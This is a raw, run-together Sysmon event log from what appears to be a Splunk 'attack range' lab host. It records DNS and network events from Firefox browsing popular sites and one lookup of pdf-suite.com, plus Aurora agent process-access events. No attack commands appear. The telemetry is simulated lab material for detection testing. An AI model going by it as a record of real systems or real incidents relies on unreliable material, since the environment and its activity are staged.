354300x800000000000000042800Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.017{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60503- 354300x800000000000000042799Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.016{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-57388- 354300x800000000000000042798Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.012{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60255- 354300x800000000000000042797Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.005{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local58839- 354300x800000000000000042796Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.005{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local57988- 354300x800000000000000042795Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.003{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local59877- 354300x800000000000000042794Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.002{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local61703- 354300x800000000000000042793Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.002{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60352- 354300x800000000000000042792Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.999{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local58742- 354300x800000000000000042791Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.998{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local62705- 354300x800000000000000042790Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.998{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local62884- 354300x800000000000000042789Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.996{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local51070- 354300x800000000000000042788Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.993{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local61192- 354300x800000000000000042787Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.993{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local58517- 354300x800000000000000042786Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.990{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56763- 354300x800000000000000042785Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.989{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local50518- 22542200x800000000000000042784Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.029{FE4C2B44-E48F-63C7-3106-00000000AF02}3296pdf-suite.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042783Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.029{FE4C2B44-E48F-63C7-3106-00000000AF02}3296pdf-suite.com064.15.159.239;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042782Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.029{FE4C2B44-E48F-63C7-3106-00000000AF02}3296www.pdf-suite.com0type: 5 pdf-suite.com;::ffff:64.15.159.239;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042781Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.024{FE4C2B44-E48F-63C7-3106-00000000AF02}3296twitter.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042780Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.024{FE4C2B44-E48F-63C7-3106-00000000AF02}3296twitter.com0104.244.42.1;104.244.42.193;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042779Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.023{FE4C2B44-E48F-63C7-3106-00000000AF02}3296twitter.com0::ffff:104.244.42.193;::ffff:104.244.42.1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042778Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.017{FE4C2B44-E48F-63C7-3106-00000000AF02}3296reddit.map.fastly.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042777Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.017{FE4C2B44-E48F-63C7-3106-00000000AF02}3296reddit.map.fastly.net0151.101.145.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042776Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.017{FE4C2B44-E48F-63C7-3106-00000000AF02}3296www.reddit.com0type: 5 reddit.map.fastly.net;::ffff:151.101.145.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042775Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.016{FE4C2B44-E48F-63C7-3106-00000000AF02}3296dyna.wikimedia.org02620:0:861:ed1a::1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042774Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.014{FE4C2B44-E48F-63C7-3106-00000000AF02}3296dyna.wikimedia.org0208.80.154.224;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042773Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.014{FE4C2B44-E48F-63C7-3106-00000000AF02}3296www.wikipedia.org0type: 5 dyna.wikimedia.org;::ffff:208.80.154.224;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042772Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.012{FE4C2B44-E48F-63C7-3106-00000000AF02}3296star-mini.c10r.facebook.com02a03:2880:f103:83:face:b00c:0:25de;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042771Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.010{FE4C2B44-E48F-63C7-3106-00000000AF02}3296youtube-ui.l.google.com02607:f8b0:4009:819::200e;2607:f8b0:4009:807::200e;2607:f8b0:4009:817::200e;2607:f8b0:4009:818::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042770Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.010{FE4C2B44-E48F-63C7-3106-00000000AF02}3296star-mini.c10r.facebook.com031.13.66.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042769Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.009{FE4C2B44-E48F-63C7-3106-00000000AF02}3296www.facebook.com0type: 5 star-mini.c10r.facebook.com;::ffff:31.13.66.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042768Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.008{FE4C2B44-E48F-63C7-3106-00000000AF02}3296youtube-ui.l.google.com0142.250.190.14;142.250.190.46;142.250.190.78;142.250.190.110;172.217.0.174;172.217.1.110;172.217.2.46;172.217.4.46;172.217.4.78;172.217.4.206;142.250.191.110;142.250.191.142;142.250.191.174;142.250.191.206;142.250.191.238;142.251.32.14;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042767Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.008{FE4C2B44-E48F-63C7-3106-00000000AF02}3296d3ag4hukkh62yn.cloudfront.net02600:9000:24f7:9400:7:49a5:5fd2:8621;2600:9000:24f7:3800:7:49a5:5fd2:8621;2600:9000:24f7:6000:7:49a5:5fd2:8621;2600:9000:24f7:7400:7:49a5:5fd2:8621;2600:9000:24f7:ba00:7:49a5:5fd2:8621;2600:9000:24f7:600:7:49a5:5fd2:8621;2600:9000:24f7:2c00:7:49a5:5fd2:8621;2600:9000:24f7:6200:7:49a5:5fd2:8621;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042766Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.007{FE4C2B44-E48F-63C7-3106-00000000AF02}3296www.youtube.com0type: 5 youtube-ui.l.google.com;::ffff:142.251.32.14;::ffff:142.250.190.14;::ffff:142.250.190.46;::ffff:142.250.190.78;::ffff:142.250.190.110;::ffff:172.217.0.174;::ffff:172.217.1.110;::ffff:172.217.2.46;::ffff:172.217.4.46;::ffff:172.217.4.78;::ffff:172.217.4.206;::ffff:142.250.191.110;::ffff:142.250.191.142;::ffff:142.250.191.174;::ffff:142.250.191.206;::ffff:142.250.191.238;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042765Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.005{FE4C2B44-E48F-63C7-3106-00000000AF02}3296e14801.x.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042764Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.005{FE4C2B44-E48F-63C7-3106-00000000AF02}3296e14801.x.akamaiedge.net072.246.21.26;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042763Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.004{FE4C2B44-E48F-63C7-3106-00000000AF02}3296d3ag4hukkh62yn.cloudfront.net0108.156.173.234;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042762Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.004{FE4C2B44-E48F-63C7-3106-00000000AF02}3296www.homedepot.com0type: 5 www.homedepot.com.edgekey.net;type: 5 e14801.x.akamaiedge.net;::ffff:72.246.21.26;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042761Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.004{FE4C2B44-E48F-63C7-3106-00000000AF02}3296www.amazon.com0type: 5 tp.47cf2c8c9-frontier.amazon.com;type: 5 d3ag4hukkh62yn.cloudfront.net;::ffff:108.156.173.234;C:\Program Files\Mozilla Firefox\firefox.exe 354300x800000000000000042760Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.862{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56333-false34.120.208.123123.208.120.34.bc.googleusercontent.com443https 354300x800000000000000042759Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.804{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56332-false35.244.181.201201.181.244.35.bc.googleusercontent.com443https 354300x800000000000000042758Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.789{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local50688- 354300x800000000000000042757Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.658{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56329-false52.34.149.78ec2-52-34-149-78.us-west-2.compute.amazonaws.com443https 354300x800000000000000042756Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.625{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56330-false23.215.105.73a23-215-105-73.deploy.static.akamaitechnologies.com80http 354300x800000000000000042755Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.618{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56331-false10.0.1.12-8000- 354300x800000000000000042754Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.587{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local64013- 354300x800000000000000042753Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.586{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56327-false34.120.115.102102.115.120.34.bc.googleusercontent.com443https 354300x800000000000000042752Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.586{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56328-false34.120.115.102102.115.120.34.bc.googleusercontent.com443https 354300x800000000000000042751Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.584{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60326- 354300x800000000000000042750Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.573{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local62089- 354300x800000000000000042749Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.571{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local50489- 354300x800000000000000042748Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.533{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56326-false72.21.91.29-80http 354300x800000000000000042747Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.521{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local61824- 354300x800000000000000042746Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.508{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56324-false35.241.9.150150.9.241.35.bc.googleusercontent.com443https 354300x800000000000000042745Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.495{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60629- 354300x800000000000000042744Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.493{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56322-false34.120.208.123123.208.120.34.bc.googleusercontent.com443https 354300x800000000000000042743Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.492{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56323-false34.120.208.123123.208.120.34.bc.googleusercontent.com443https 354300x800000000000000042742Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.444{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local64641- 354300x800000000000000042741Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.340{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56321-false23.215.105.73a23-215-105-73.deploy.static.akamaitechnologies.com80http 354300x800000000000000042740Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.336{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56320-false34.160.144.191191.144.160.34.bc.googleusercontent.com443https 354300x800000000000000042739Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.325{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local59422- 354300x800000000000000042738Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.324{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local58426- 354300x800000000000000042737Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.324{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local49953- 23542300x800000000000000016729Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:44.891{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66AAED2AD2A574B68E95738A956AAE4F,SHA256=7408AD54D5C620901244C16BB4B3C7A2E219C19A3DD5F7725D89B2A3D241AAE3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000042898Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.876{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3806-00000000AF02}3692C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042897Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.876{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3806-00000000AF02}3692C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042896Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.876{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3806-00000000AF02}3692C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042895Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:44.875{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3706-00000000AF02}4504C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program 